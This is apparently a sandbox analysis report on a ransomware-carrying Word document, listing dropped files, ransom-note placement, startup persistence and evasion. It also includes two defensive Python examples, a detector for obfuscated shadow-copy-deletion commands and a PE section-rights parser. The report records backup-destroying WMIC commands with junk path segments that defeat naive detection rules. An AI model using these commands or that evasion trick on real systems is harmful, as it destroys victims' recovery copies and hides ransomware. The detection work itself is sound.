Source: C:\Windows\Temp\wupd12.14.tmp | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Temp\wupd12.14.tmp | File read: C:\Windows\System32\drivers\etc\hosts
Classification label
Source: classification engine | Classification label: mal100.rans.spre.phis.spyw.expl.evad.winDOC@9/176@0/9
Contains functionality to instantiate COM classes
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_0043947E: CoInitializeEx, Sleep, CoCreateInstance, CoUninitialize
Creates files inside the program directory
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Program Files\5e4c085c3c4e0000.tmp
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$Verdi.doc
Creates temporary files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user~1\AppData\Local\Temp\CVRB699.tmp
Document contains summary information with irregular field values
Source: Verdi.doc | OLE document summary: title field not present or empty
Source: Verdi.doc | OLE document summary: author field not present or empty
Source: Verdi.doc | OLE document summary: edited time not present or 0
Source: Verdi.doc | OLE document summary: title field not present or empty
Source: Verdi.doc | OLE document summary: author field not present or empty
Source: Verdi.doc | OLE document summary: edited time not present or 0
Reads ini files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Windows\Temp\wupd12.14.tmp | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus
Source: Verdi.doc | VirusTotal: Detection: 50%
Spawns processes
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown | Process created: C:\Windows\Temp\wupd12.14.tmp C:\Windows\Temp\wupd12.14.tmp
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown | Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\bjy\..\Windows\cib\jduxt\..\..\system32\sy\oaljs\..\..\wbem\mdbkx\..\wmic.exe' shadowcopy delete
Source: unknown | Process created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txt
Source: unknown | Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\xchrq\..\Windows\uraci\..\system32\vtm\nxe\jormg\..\..\..\wbem\denq\..\wmic.exe' shadowcopy delete
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\Temp\wupd12.14.tmp C:\Windows\Temp\wupd12.14.tmp
Source: C:\Windows\Temp\wupd12.14.tmp | Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\bjy\..\Windows\cib\jduxt\..\..\system32\sy\oaljs\..\..\wbem\mdbkx\..\wmic.exe' shadowcopy delete
Source: C:\Windows\Temp\wupd12.14.tmp | Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\xchrq\..\Windows\uraci\..\system32\vtm\nxe\jormg\..\..\..\wbem\denq\..\wmic.exe' shadowcopy delete
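The two WMIC command lines above are worth a second look: the image path is padded with random directory names and `..` segments (`C:\bjy\..\Windows\cib\jduxt\..\..\system32\...`) so that the path the loader resolves is still `C:\Windows\system32\wbem\wmic.exe`, while a detection rule that looks for the literal substring `\wbem\wmic.exe` in the command line never fires. The following normaliser, added here as an example and not code from the Joe Sandbox report, resolves the image path the way the Windows path rules do before matching the arguments. The two observed command lines are taken from the report; the rule table and function names are this example's own, and the `vssadmin`/`wbadmin` rules go beyond what the report shows and are included as well-known equivalents of the same technique.

```python
"""Normalise a Windows process command line before matching it against a
shadow-copy-deletion rule.

Added example, not Joe Sandbox code. OBSERVED_CMDLINES are the two command
lines recorded in the report (quoted the way the report renders them); RULES
and all function names are this example's own."""
import ntpath
import re
from dataclasses import dataclass

OBSERVED_CMDLINES = [
    r"'C:\bjy\..\Windows\cib\jduxt\..\..\system32\sy\oaljs\..\..\wbem\mdbkx\..\wmic.exe' shadowcopy delete",
    r"'C:\xchrq\..\Windows\uraci\..\system32\vtm\nxe\jormg\..\..\..\wbem\denq\..\wmic.exe' shadowcopy delete",
]

# (image basename, regex over the argument string, rule name). The vssadmin
# and wbadmin entries are well-known equivalents not present in the report.
RULES = [
    ("wmic.exe",     re.compile(r"\bshadowcopy\s+delete\b", re.IGNORECASE), "wmic shadowcopy delete"),
    ("vssadmin.exe", re.compile(r"\bdelete\s+shadows\b",    re.IGNORECASE), "vssadmin delete shadows"),
    ("wbadmin.exe",  re.compile(r"\bdelete\s+catalog\b",    re.IGNORECASE), "wbadmin delete catalog"),
]


@dataclass(frozen=True)
class ParsedCmd:
    image: str      # normalised full path of the executable
    basename: str   # lower-cased file name, the key used by RULES
    args: str       # everything after the image token


def split_image(cmdline: str) -> tuple[str, str]:
    """Return (image, args); the first token may be quoted with ' or \"."""
    cmdline = cmdline.strip()
    m = re.match(r"""(['"])(.*?)\1\s*(.*)""", cmdline, re.DOTALL)
    if m:
        return m.group(2), m.group(3)
    parts = cmdline.split(None, 1)
    return parts[0], (parts[1] if len(parts) > 1 else "")


def normalise(cmdline: str) -> ParsedCmd:
    image, args = split_image(cmdline)
    # ntpath.normpath collapses 'dir\..' and '.' segments exactly as the
    # Windows path rules do, and works on any host OS.
    image = ntpath.normpath(image)
    return ParsedCmd(image, ntpath.basename(image).lower(), args)


def match_rules(cmdline: str) -> list[str]:
    """Names of all RULES the (normalised) command line satisfies."""
    p = normalise(cmdline)
    return [name for exe, arg_re, name in RULES if p.basename == exe and arg_re.search(p.args)]


def naive_match(cmdline: str) -> bool:
    """The substring rule a detection might ship with; the junk path segments defeat it."""
    low = cmdline.lower()
    return "\\wbem\\wmic.exe" in low and "shadowcopy delete" in low


if __name__ == "__main__":
    for c in OBSERVED_CMDLINES:
        p = normalise(c)
        print(f"{p.image} | naive={naive_match(c)} normalised={match_rules(c)}")
```

Run against the report's two lines, `naive_match` returns False for both while `match_rules` fires `wmic shadowcopy delete` for both, because after normalisation the image is `C:\Windows\system32\wbem\wmic.exe` in each case. The same normalisation belongs in front of any command-line rule, not only this one; the parent process (`wupd12.14.tmp`, itself launched by WINWORD.EXE) is a second, independent signal worth keying on.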
Uses an in-process (OLE) Automation server
Source: C:\Windows\Temp\wupd12.14.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Writes ini files
Source: C:\Windows\Temp\wupd12.14.tmp | File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\compatibility.ini
Executable creates window controls seldom found in malware
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Window found: window name: SysTabControl32
Uses Rich Edit Controls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\system32\MSFTEDIT.DLL
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Document is a ZIP file with path names indicative of goodware
Source: Verdi.doc | Initial sample: OLE zip file path = word/media/image3.wmf
Source: Verdi.doc | Initial sample: OLE zip file path = word/media/image4.jpeg
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Creates a directory in C:\Program Files
Source: C:\Windows\Temp\wupd12.14.tmp | Directory created: C:\Program Files\5e4c085c3c4e0000.tmp
Source: C:\Windows\Temp\wupd12.14.tmp | Directory created: C:\Program Files\DECRYPT-FILES.txt
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: scrrun.pdb | source: WINWORD.EXE, 00000000.00000002.336869351.072F0000.00000002.00000001.sdmp
Source: Binary string: InkEd.pdb | source: WINWORD.EXE, 00000000.00000002.329912926.049B0000.00000002.00000001.sdmp
Source: Binary string: D:\office\Target\word\x86\ship\0\msword.PDB | source: WINWORD.EXE, 00000000.00000002.328656328.03DE0000.00000002.00000001.sdmp
Document has a 'vbamacros' value indicative of goodware
Source: Verdi.doc | Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Windows\Temp\wupd12.14.tmp | Unpacked PE file: 5.2.wupd12.14.tmp.400000.4.unpack .text:ER;.data:W;.rsrc:W;Unknown_Section3:W;Unknown_Section4:W; vs .text:ER;.rdata:R;.data:W;
Detected unpacking (overwrites its own PE header)
Source: C:\Windows\Temp\wupd12.14.tmp | Unpacked PE file: 5.2.wupd12.14.tmp.400000.4.unpack
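The `.text:ER;.data:W;...` notation in the unpacking signature is a per-section rendering of the `IMAGE_SCN_MEM_EXECUTE`, `IMAGE_SCN_MEM_READ` and `IMAGE_SCN_MEM_WRITE` bits in the section header's `Characteristics` field, and the signature fires because the section layout of the image dumped from memory no longer matches the file on disk. The parser below, added here as an example and not Joe Sandbox's own implementation, reads that table from a PE image and renders it in the same form so the two can be diffed. The PE images it parses are constructed in-memory skeletons (not the sample); only their section names and access flags mirror the on-disk and unpacked layouts the report prints, and labelling nameless sections `Unknown_Section<index>` is an assumption made to reproduce the report's notation.

```python
"""Render PE section access rights in the report's E/R/W notation and diff
two images (file on disk vs. memory dump).

Added example, not Joe Sandbox code. ON_DISK and IN_MEMORY are constructed
header-only PE skeletons whose sections mirror the report's two layouts; they
are not the sample and Windows would not load them."""
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ    = 0x40000000
IMAGE_SCN_MEM_WRITE   = 0x80000000
FLAG_LETTERS = ((IMAGE_SCN_MEM_EXECUTE, "E"), (IMAGE_SCN_MEM_READ, "R"), (IMAGE_SCN_MEM_WRITE, "W"))


def section_rights(pe: bytes) -> list[tuple[str, str]]:
    """Return [(section name, 'E'/'R'/'W' letters), ...] in table order."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4  # IMAGE_FILE_HEADER: Machine(2) NumberOfSections(2) ... SizeOfOptionalHeader(2) at +16
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size  # section headers follow the optional header
    out = []
    for i in range(num_sections):
        entry = pe[table + 40 * i: table + 40 * (i + 1)]
        # IMAGE_SECTION_HEADER: Name[8] at 0, Characteristics (DWORD) at 36
        name = entry[:8].rstrip(b"\0").decode("ascii", "replace") or f"Unknown_Section{i}"
        chars = struct.unpack_from("<I", entry, 36)[0]
        out.append((name, "".join(letter for bit, letter in FLAG_LETTERS if chars & bit)))
    return out


def render(rights: list[tuple[str, str]]) -> str:
    """Same string form the report uses: '.text:ER;.data:W;'"""
    return "".join(f"{name}:{flags};" for name, flags in rights)


def changed_rights(on_disk, in_memory) -> list[str]:
    """Sections whose rights differ between the two images or exist in only one."""
    a, b = dict(on_disk), dict(in_memory)
    return sorted(n for n in set(a) | set(b) if a.get(n) != b.get(n))


def build_pe(sections: list[tuple[bytes, int]]) -> bytes:
    """Construct a header-only x86 PE with the given (name, Characteristics)
    entries; only the fields section_rights() reads carry meaning."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                      # e_lfanew
    opt = bytes(0xE0)                                           # zeroed PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x0102)
    table = b"".join(struct.pack("<8sIIIIIIHHI", n, 0, 0, 0, 0, 0, 0, 0, 0, c) for n, c in sections)
    return bytes(dos) + b"PE\0\0" + coff + opt + table


E, R, W = IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
# Constructed to mirror the report's 'vs' side (file as dropped) ...
ON_DISK = build_pe([(b".text", E | R), (b".rdata", R), (b".data", W)])
# ... and its unpacked side: .rdata gone, .rsrc and two nameless sections writable.
IN_MEMORY = build_pe([(b".text", E | R), (b".data", W), (b".rsrc", W), (b"", W), (b"", W)])

if __name__ == "__main__":
    print(render(section_rights(IN_MEMORY)), "vs", render(section_rights(ON_DISK)))
    print("changed:", changed_rights(section_rights(ON_DISK), section_rights(IN_MEMORY)))
```

On real input, replace `ON_DISK` with the bytes of `wupd12.14.tmp` and `IN_MEMORY` with a process dump of the same module; a non-empty `changed_rights` result, or any section that gains `W` or `E`, is the signal this signature encodes.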
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004320D0 push 000014CBh; retf 5_2_004320EE
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 004219EFh; ret 5_2_00421F8B
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 004219EFh; ret 5_2_0042206E
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 004219EFh; ret 5_2_004220B4
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 004219EFh; ret 5_2_00422112
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 004219EFh; ret 5_2_00422217
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 004219EFh; ret 5_2_00422243
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 004219EFh; ret 5_2_00422395
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 004219EFh; ret 5_2_00422463
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 004219EFh; ret 5_2_0042248C
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 004219EFh; ret 5_2_004224DD
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 004219EFh; ret 5_2_004225BD
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 004219EFh; ret 5_2_00422671
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 004219EFh; ret 5_2_0042271D
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 004219EFh; ret 5_2_0042288D
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 004219EFh; ret 5_2_00422A78
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 004219EFh; ret 5_2_00422AFB
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 004219EFh; ret 5_2_00422B2B
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 004219EFh; ret 5_2_00422BC1
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 004219EFh; ret 5_2_00422C73
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 004219EFh; ret 5_2_00422CE0
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 004219EFh; ret 5_2_00422DE3
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 004219EFh; ret 5_2_00422E07
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 004219EFh; ret 5_2_00422ED1
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 004219EFh; ret 5_2_00422F46
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 004219EFh; ret 5_2_00422FB5
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 0042300Dh; ret 5_2_0042336D
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 0042300Dh; ret 5_2_0042340C
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 0042300Dh; ret 5_2_0042348C
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 0042300Dh; ret 5_2_004234B9
Source: C:\Windows\Temp\wupd12.14.tmp | Code function: 5_2_004219E0 push 0042300Dh; ret 5_2_00423503

Persistence and Installation Behavior:

Infects executable files (exe, dll, sys, html)
Source: C:\Windows\Temp\wupd12.14.tmp | System file mapped for write: C:\Users\user\AppData\Roaming\.jre\Welcome.html
Source: C:\Windows\Temp\wupd12.14.tmp | System file written: C:\Users\user\AppData\Roaming\.jre\Welcome.html
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Windows\Temp\wupd12.14.tmp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\wordupd[1].tmp
Drops PE files to the windows directory (C:\Windows)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Windows\Temp\wupd12.14.tmp
Searches for installed JRE in non-default directory
Source: C:\Windows\Temp\wupd12.14.tmp | File opened: C:\Users\user\AppData\Roaming\.jre\ (access: read data or list directory, synchronize)
Source: C:\Windows\Temp\wupd12.14.tmp | File opened: C:\Users\user\AppData\Roaming\.jre\bin\ (access: read data or list directory, synchronize)
Source: C:\Windows\Temp\wupd12.14.tmp | File opened: C:\Users\user\AppData\Roaming\.jre\bin\client\ (access: read data or list directory, synchronize)
Source: C:\Windows\Temp\wupd12.14.tmp | File opened: C:\Users\user\AppData\Roaming\.jre\bin\dtplugin\ (access: read data or list directory, synchronize)
Source: C:\Windows\Temp\wupd12.14.tmp | File opened: C:\Users\user\AppData\Roaming\.jre\bin\plugin2\ (access: read data or list directory, synchronize)
Source: C:\Windows\Temp\wupd12.14.tmp | File opened: C:\Users\user\AppData\Roaming\.jre\lib\ (access: read data or list directory, synchronize)
Source: C:\Windows\Temp\wupd12.14.tmp | File opened: C:\Users\user\AppData\Roaming\.jre\lib\applet\ (access: read data or list directory, synchronize)
Source: C:\Windows\Temp\wupd12.14.tmp | File opened: C:\Users\user\AppData\Roaming\.jre\lib\cmm\ (access: read data or list directory, synchronize)
Source: C:\Windows\Temp\wupd12.14.tmp | File opened: C:\Users\user\AppData\Roaming\.jre\lib\deploy\ (access: read data or list directory, synchronize)
Source: C:\Windows\Temp\wupd12.14.tmp | File opened: C:\Users\user\AppData\Roaming\.jre\lib\ext\ (access: read data or list directory, synchronize)
Source: C:\Windows\Temp\wupd12.14.tmp | File opened: C:\Users\user\AppData\Roaming\.jre\lib\fonts\ (access: read data or list directory, synchronize)
Source: C:\Windows\Temp\wupd12.14.tmp | File opened: C:\Users\user\AppData\Roaming\.jre\lib\i386\ (access: read data or list directory, synchronize)
Source: C:\Windows\Temp\wupd12.14.tmp | File opened: C:\Users\user\AppData\Roaming\.jre\lib\images\ (access: read data or list directory, synchronize)
Source: C:\Windows\Temp\wupd12.14.tmp | File opened: C:\Users\user\AppData\Roaming\.jre\lib\images\cursors\ (access: read data or list directory, synchronize)
Source: C:\Windows\Temp\wupd12.14.tmp | File opened: C:\Users\user\AppData\Roaming\.jre\lib\jfr\ (access: read data or list directory, synchronize)
Source: C:\Windows\Temp\wupd12.14.tmp | File opened: C:\Users\user\AppData\Roaming\.jre\lib\management\ (access: read data or list directory, synchronize)
Source: C:\Windows\Temp\wupd12.14.tmp | File opened: C:\Users\user\AppData\Roaming\.jre\lib\security\ (access: read data or list directory, synchronize)
Source: C:\Windows\Temp\wupd12.14.tmp | File opened: C:\Users\user\AppData\Roaming\.jre\lib\security\policy\ (access: read data or list directory, synchronize)
Source: C:\Windows\Temp\wupd12.14.tmp | File opened: C:\Users\user\AppData\Roaming\.jre\lib\security\policy\limited\ (access: read data or list directory, synchronize)
Source: C:\Windows\Temp\wupd12.14.tmp | File opened: C:\Users\user\AppData\Roaming\.jre\lib\security\policy\unlimited\ (access: read data or list directory, synchronize)

Boot Survival:

Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5e4c085c3c4e0000.tmp
Stores files to the Windows start menu directory
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\5e4c085c3c4e0000.tmp
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\DECRYPT-FILES.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\5e4c085c3c4e0000.tmp
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DECRYPT-FILES.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\5e4c085c3c4e0000.tmp
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\DECRYPT-FILES.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\5e4c085c3c4e0000.tmp
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\DECRYPT-FILES.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\5e4c085c3c4e0000.tmp
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\DECRYPT-FILES.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\5e4c085c3c4e0000.tmp
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\DECRYPT-FILES.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\Default\Start Menu\5e4c085c3c4e0000.tmp
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\5e4c085c3c4e0000.tmp
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\DECRYPT-FILES.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\5e4c085c3c4e0000.tmp
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DECRYPT-FILES.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\5e4c085c3c4e0000.tmp
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\DECRYPT-FILES.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\5e4c085c3c4e0000.tmp
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\DECRYPT-FILES.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\5e4c085c3c4e0000.tmp
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\DECRYPT-FILES.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\5e4c085c3c4e0000.tmp
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\DECRYPT-FILES.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\5e4c085c3c4e0000.tmp
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\DECRYPT-FILES.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5e4c085c3c4e0000.tmp
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txt
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\Users\user\Start Menu\5e4c085c3c4e0000.tmp

Hooking and other Techniques for Hiding and Protection:

Creates files in the recycle bin to hide itself
Source: C:\Windows\Temp\wupd12.14.tmp | File created: C:\$Recycle.Bin\5e4c085c3c4e0000.tmp
Disables application error messages (SetErrorMode)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (73 identical entries)
Source: C:\Windows\Temp\wupd12.14.tmp | Process information set: NOOPENFILEERRORBOX (20 identical entries)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (22 identical entries)
Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX (4 identical entries)

Malware Analysis System Evasion:

Contains functionality to detect virtual machines (SLDT)